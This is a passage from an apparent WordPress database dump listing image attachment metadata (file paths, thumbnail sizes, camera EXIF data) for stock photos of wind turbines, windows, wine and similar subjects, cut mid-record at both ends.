ind-turbine-sun-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"wind-turbine-sun-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(448,194,'_wp_attached_file','2017/10/wind-turbine.jpg'),(449,194,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:679;s:4:\"file\";s:24:\"2017/10/wind-turbine.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"wind-turbine-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"wind-turbine-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"wind-turbine-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX L840\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:5:\"121.8\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(450,195,'_wp_attached_file','2017/10/wind-energy-2244141_960_720.jpg'),(451,195,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:453;s:4:\"file\";s:39:\"2017/10/wind-energy-2244141_960_720.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"wind-energy-2244141_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"wind-energy-2244141_960_720-300x142.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"wind-energy-2244141_960_720-768x362.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:362;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 70D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"22\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(452,196,'_wp_attached_file','2017/10/Windmill.jpg'),(453,196,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:20:\"2017/10/Windmill.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Windmill-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Windmill-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Windmill-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"11\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D610\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:3:\"0.4\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(454,197,'_wp_attached_file','2017/10/windmills.jpg'),(455,197,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:21:\"2017/10/windmills.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"windmills-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"windmills-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"windmills-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(456,198,'_wp_attached_file','2017/10/window-cleaning.jpg'),(457,198,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:360;s:6:\"height\";i:270;s:4:\"file\";s:27:\"2017/10/window-cleaning.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"window-cleaning-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"window-cleaning-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:15:\"Iakov Filimonov\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(458,199,'_wp_attached_file','2017/10/window-old-hatch.jpg'),(459,199,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:28:\"2017/10/window-old-hatch.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"window-old-hatch-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"window-old-hatch-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"window-old-hatch-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D750\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:8:\"0.000625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(460,200,'_wp_attached_file','2017/10/window-pots.jpg'),(461,200,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:564;s:4:\"file\";s:23:\"2017/10/window-pots.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"window-pots-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"window-pots-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"window-pots-768x451.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(462,201,'_wp_attached_file','2017/10/window-top.jpg'),(463,201,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:631;s:4:\"file\";s:22:\"2017/10/window-top.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"window-top-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"window-top-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"window-top-768x505.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"E-M10\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"25\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(464,202,'_wp_attached_file','2017/10/window.jpg'),(465,202,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:18:\"2017/10/window.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"window-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"window-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"window-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(466,203,'_wp_attached_file','2017/10/window-cleaning-1.jpg'),(467,203,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:360;s:6:\"height\";i:270;s:4:\"file\";s:29:\"2017/10/window-cleaning-1.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"window-cleaning-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"window-cleaning-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:15:\"Iakov Filimonov\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(468,204,'_wp_attached_file','2017/10/wine-glass.jpg'),(469,204,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:22:\"2017/10/wine-glass.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"wine-glass-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"wine-glass-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"wine-glass-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(470,205,'_wp_attached_file','2017/10/wine-glasses.jpg'),(471,205,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:24:\"2017/10/wine-glasses.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"wine-glasses-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"wine-glasses-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"wine-glasses-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 70D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(472,206,'_wp_attached_file','2017/10/wine-labes.jpg'),(473,206,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:698;s:6:\"height\";i:698;s:4:\"file\";s:22:\"2017/10/wine-labes.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"wine-labes-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"wine-labes-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(474,207,'_wp_attached_file','2017/10/wine.jpg'),(475,207,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:696;s:4:\"file\";s:16:\"2017/10/wine.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"wine-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"wine-300x218.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"wine-768x557.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:557;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D7200\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:4:\"1400\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(476,208,'_wp_attached_file','2017/10/wing-fan.jpg'),(477,208,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:635;s:4:\"file\";s:20:\"2017/10/wing-fan.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"wing-fan-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"wing-fan-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"wing-fan-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(478,209,'_wp_attached_file','2017/10/winter-holiday.jpg'),(479,209,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:26:\"2017/10/winter-holiday.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"winter-holiday-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"winter-holiday-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"winter-holiday-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(480,210,'_wp_attached_file','2017/10/winter-socks.jpg'),(481,210,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:719;s:4:\"file\";s:24:\"2017/10/winter-socks.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"winter-socks-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"winter-socks-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"winter-socks-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(482,211,'_wp_attached_file','2017/10/wire.jpg'),(483,211,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:16:\"2017/10/wire.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"wire-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"wire-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"wire-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(484,212,'_wp_attached_file','2017/10/wires-on-back.jpg'),(485,212,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:638;s:4:\"file\";s:25:\"2017/10/wires-on-back.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"wires-on-back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"wires-on-back-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"wires-on-back-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"120\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(486,213,'_wp_attached_file','2017/10/wiring-cv.jpg'),(487,213,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:637;s:4:\"file\";s:21:\"2017/10/wiring-cv.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"wiring-cv-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"wiring-cv-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"wiring-cv-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(488,214,'_wp_attached_file','2017/10/wise-up-to-waste.png'),(489,214,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:266;s:6:\"height\";i:129;s:4:\"file\";s:28:\"2017/10/wise-up-to-waste.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"wise-up-to-waste-150x129.png\";s:5:\"width\";i:150;s:6:\"height\";i:129;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(490,215,'_wp_attached_file','2017/10/woman.jpg'),(491,215,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:17:\"2017/10/woman.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"woman-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"woman-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"woman-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s